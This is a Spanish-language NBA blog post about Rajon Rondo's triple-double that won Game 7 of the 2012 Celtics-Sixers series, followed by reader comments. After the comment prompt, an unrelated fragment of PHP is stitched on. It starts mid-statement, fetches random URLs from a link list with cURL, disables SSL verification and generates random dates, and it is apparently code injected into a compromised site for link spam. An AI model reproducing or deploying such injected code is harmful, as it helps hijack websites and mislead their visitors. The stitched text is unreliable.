La Crónica: Rajon “The Answer” Rondo

27 de May de 2012 por txusma

Decía una compañero céltico hace unos días: “Qué bonito es ver jugar a Rondo… aunque no siempre sea lo que necesitamos…”. Creo que tras el partido anoche tendrá que replantearse un poco su opinión porque Rajon Rondo tomó prestado el apodo de Allen Iverson y se convirtió en The Answer.

No lo digo porque de repente se convirtiera en un anotador letal y él sólo anotara casi el 50% de los puntos de su equipo, pasándose a todos sus defensores por la piedra. El significado es más literal. A falta de 4 minutos y 16 segundos el partido discurría igualado, enfangado como a los Sixers les gusta. Los Celtics estaban 3  puntos arriba pero su principal arma ofensiva, Paul Pierce, acababa de ser expulsado por faltas. Alguien debía dar un paso en Boston y lo dio Rondo. Anotó 9 puntos consecutivos, incluido su primer triple de la serie, que convirtieron la exigua ventaja en unos sólidos 10 puntos que los verdes consiguieron mantener hasta el final del partido. En esos últimos minutos Rondo completó su noveno triple-doble en playoffs, el cuarto que más ha conseguido en la historia, lo que le permitió unir su nombre al de Larry Bird como los únicos célticos capaces de conseguir un triple-doble en un séptimo partido de la serie.

A lo mejor Rondo no es siempre lo que necesita Boston pero creo que deberían empezar a hacerle un hueco en los libros de historia céltica. Lebron, Wade y compañía le esperan en las finales de conferencia.

PREMIOS

MVP: 18 puntos, 10 rebotes, 10 asistencias, una actuación primorosa en el último cuarto. Los Celtics se lo deben todo a Rajon Rondo.

Sorpresa: Ray Allen llegó al último cuarto habiendo fallado 8 de sus 9 lanzamientos pero en el cuarto conectó los 2 triples que intentó. Justo en el momento adecuado.

Decepción: Los Celtics necesitarán mucha más aportación de su banquillo si quieren optar a algo aún más grande. Dooling, Stiemsma, Pietrus y Hollins solo fueron capaces de anotar 7 puntos.

Esfuerzo en vano: Jrue Holiday fue el Sixers más incisivo pero esta vez no estuvo tan acertado de cara al aro (5 de 17). Finalmente se quedó con 15 puntos, 9 asistencias y 5 robos.

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. nba dice:
    #1

    La verdad es que el partido ha sido emocionante, pero malo.Los Sixers lo han tenido en la punta de los dedos, veremos si es cosa de una atipica temporada o por el contrario consiguen consolidarse .
    Yo veo favoritos a Miami, pero habra que esperar a ver que version de Garnett vemos en esa eliminatoria

      Citar

  2. Sancho88 dice:
    #2

    Para mí Sixers no ha hecho casi nada para ganar este último partido, y tan solo algunas apariciones esporádicas de Holiday, porque este tío nunca se borra y se motiva a sí mismo que da gusto, y sobre todo de Iguodala, otro que tal baila, han sido los únicos puntales a los que agarrarse para los Sixers… si el partido en algún momento pudo estar más igualado fue por la falta de oxígeno en los pulmones célticos. No obstante, la calidad rebosa por los poros, y más o menos todos los cracks han respondido: Pierce en la primera parte lo hizo bastante bien, aunque al final hizo cuatro faltas ridículas en el último cuarto que le pudieron costar muy caro a su equipo; después Garnett ha sido el más constante del ‘Big four’, aportando en todo momento, y también con canastas muy clave en el tercer cuarto; Allen con sus dos triples y sus tobillos echos mierda… bastante fue; y por último Rondo, que muchas veces peca de pasador, finalmente fue el factor x decisivo. Hacía falta en el partido alguien que asumiera la responsabilidad y él lo hizo. Yo creo que el comentario de “Rondo a veces no es lo que necesitamos” es desacertado, o al menos no entiendo muy bien por dónde va. Quiero decir, para mí Rondo casi siempre está acertado, salvo en algunas pérdidas ridículas porque tampoco tiene un manejo de balón glorioso… pero si por algo lo criticaría, es por pasar y pasar y pasar demasiado. A veces no contempla su propio tiro como una posiblidad más, y eso resta poder ofensivo a su equipo. Tiene que ser un poco más egoísta y pensar menos en las asistencias, se obsesiona un poco verdaderamente.

    Bass también jugó muy bien en el primer cuarto, y creo que en la final los Celtics van a echar mucho de menos a Bradley, ya que reclamas con razón aportación desde el banquillo. Con Bradley de inicio, Allen puede jugar minutos de mucha más calidad porque ahora mismo está forzando en cada momento en cancha. Cuando todo esto acabe se operará, y veremos cuándo vuelve…

    Aparte de Bass, que encima es titular, no veo a nadie asumiendo protagonismo en la segunda línea. Símplemente, no hay jugadores en el banquillo de los Celtics que tengan algo de talento ofensivo. La ventaja ahí es que en los Heat pasa tres cuartos de lo mismo. El enfrentamiento de segundas unidades puede ser dantesco por lo humillante de ambos fondos de banquillo… jeje. Ahí la premisa para gente como Dooling, Stiemsma o Hollins es defender a muerte, no dejarse robar rebotes ofensivos y rezar para hacer algo en ataque. No tienen más, esa es la realidad.

    No sé, final demasiado inclinada para MIami, con Allen en muy malas condiciones, pero con el corazón y el orgullo intacto. Los Celtics necesitarán la mejor versión de Pierce durante todos los minutos. Lebron no va a afljojar, y él tampoco puede hacerlo. A ver cómo aprovechan la superioridad Bass+Garnett, aunque está claro que Spoelstra va a plantar one more time a Battier+Anthony para tocar las pelotillas, jejeje.

    Dicho esto, vaya rachita final de Rondo… yo ni me lo creía

      Citar

  3. HisRoyalAirness dice:
    #3

    Siempre que alguien dice que el mejor base puro de la liga es CP3 yo me río un poco…no porque no lo sea, que es un crack, pero es que llegan los PO y Rondo se desata. Es increíble. Siempre se le achaca lo del tiro pero es que si aún encima tirase bien sería el mejor jugador de la historia.

    Pero bueno, hoy lo importante es que el Depor vuelve a primera!!!!

      Citar

  4. arvydas dice:
    #4

    Esta noche Fisher a salido a cazar…

      Citar

  5. HisRoyalAirness dice:
    #5

    El que ha salido es Manu, vaya recital

      Citar

  6. arvydas dice:
    #6

    HisRoyalAirness:
    El que ha salido es Manu, vaya recital

    otro que tal…
    K. Leonard crack!!

      Citar

  7. Nacho dice:
    #7

    ¡Cómo se nota que Splitter ya ha pasado por momentos calientes! Partidazo está haciendo cuando al resto de los imberbes de las espuelas les puede el miedo. Eso sí lo de los libres, mirárselo.

      Citar

  8. joaq dice:
    #8

    mamita que pase gino.. abierto a parker.
    Arriba las espuelas, los dieron vuelta.

      Citar

  9. Nacho dice:
    #9

    ¡Qué bueno es Manu!
    ¿Dirá ahora Denise lo del robo de los Lakers, con un tal Sessions y un tal Fisher?
    ¿Si pierden OKC, Brooks le pondrá el partido a Westbrook a lo ‘naranja mecánica?

      Citar

  10. Nacho dice:
    #10

    GINOBILI.
    LA TONSURA DIVINA.
    Su canasta a falta de dos minutos, para la leyenda.
    En resumen, a parte del estado de gracia de Manu, el partido se resume en dos frases:
    Un equipo con infinidad de variantes ofrensivas, otro con un tipo que no sabe tomar decisiones.

      Citar

  11. simon dice:
    #11

    Por cierto a quien haya visto el partido, ha habido lesión de Ibaka? es que 21 minutos solamente para el son de risa…
    Mirando un poco el box score veo que Ibaka. Collison y Perkins se han combinado solo para 67 minutos. Ha jugado Durant muchisimo tiempo de 4 o que??

      Citar

  12. GreenPride dice:
    #12

    Me sorprende los pocos comentarios que ha suscitado el 7º partido de la serie Celtics-Sixers.
    Bueno ahí va mi opinión. Antes de nada como aficionado celtic dar las gracias a este equipo y sus jugadores por estos últimos 5 años. Han recuperado el Celtic Pride y hemos vuelto a vivir sensaciones que parecían olvidadas. Dicho esto, creo que esta ha sido su última gran victoria y lo han hecho por corazón y por sapiencia baloncestística.
    Un equipo que se conoce muy bien y sabe de sus defectos y de sus virtudes y que se exprime al máximo. Además está magníficamente dirigido por el gran Doc Rivers.
    En este último partido tras el acelerón inicial con Bass enchufando se sabía que se iba a sufrir. Los Celtics no tienen piernas para todo un partido por lo que era poco probable que pudieran ganar fácil. Y así se entró en el típico partido de estas series. Juego trabado, pocos puntos, mucha defensa y los Celtics siempre por delante con Philly haciendo la goma. La superioridad física de los Sixers era contrarrestada por el gran esfuerzo de Garnett bajo los aros y por el tempo llevado por Rondo (aunque parezca increíble al descanso los Celtics llevaban 13 puntos de contraataque por 2 de los Sixers).
    Con los Celtics sobreviviendo por delante con sus reservas intentando dejar algo de aliento a los titulares se entró en el último cuarto. Bolas a Pierce por parte de los Celtics y los Sixers contestan haciéndole 2×1 en cuanto recibe el balón, contando con que Rondo y Ray Allen no van a meter una (cada uno por razones distintas). Con Pierce bastante cansado y sobremarcado los Celtics optan por empezar a jugar Pick%Roll entre Rondo y Garnett y éste último mete varias canastas muy importantes para mantener la ventaja. En esos momentos también ayudan mucho 2 triples providenciales de Ray Allen que había estado nefasto toda la serie lastrado por sus tobillos. Cuando parece que Boston empieza a asegurar la victoria nueva reacción de los Sixers y además un Pierce cansado comete varias faltas tontas y es eliminado a 4:16 por jugar. Así parece que es el momento para que los de Philadelphia den la vuelta al marcador y…. tampoco. Rondo se echa el equipo a la espalda mete un par de bandejas, luego una de dos pisando el triple y luego una de tres, 9 puntos seguidos que dan a los Celtics el estirón final para llevarse el partido y las series. Por Philly sólo Holiday, Iguodala y algo Brand supieron estar a la altura. En cierta medida se esperaba que los verdes les diesen una lección de veteranía y así ha sido.
    Por Boston su Big Four respondió llevando el peso en algún momento cada uno. Gran partido de Pierce, aunque al final hiciese unas faltas tontas que les pudieron costar el partido. Fenomenal KG, matando por dentro y por fuera, luchando como un jabato el rebote, siendo agresivo como siempre, defendiendo su aro a muerte. Allen muy mal de los tobillos sacó las fuerzas justas para meter 2 triples providenciales y Rondo supo dirigir y tomar la responsabilidad anotadora al final.
    Y ahora los Heat, ¿mission impossible para este equipo? Pues sinceramente yo creo que sí. Repasemos el estado de los verdes: Jeff Green, Jermaine O’Neal y Avery Bradley fuera lesionados. Ray Allen metiendo menos del 30% de sus tiros por su lesión de tobillo, Paul Pierce con la rodilla siendo tratada antes de cada partido con el ligamento tocado, Pietrus con la rodilla tocada, Stiemsma fascitis plantar, Rondo tocado de la cadera (ver las veces que intenta hacer un mate o una bandeja alta lo que le pasa), vamos con la enfermería que se desborda y creo así no van a tener opciones contra los Heat ya no digamos como se recupere Bosh. Creo que esta ha sido la última hazaña de la época del Big Three, ahora Big Four pero que bien nos lo han hecho pasar. Ahora a disputar cómo se pueda esta serie y a sacar al menos un partidito de los del Garden, más de eso ya sería increíble par mí

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>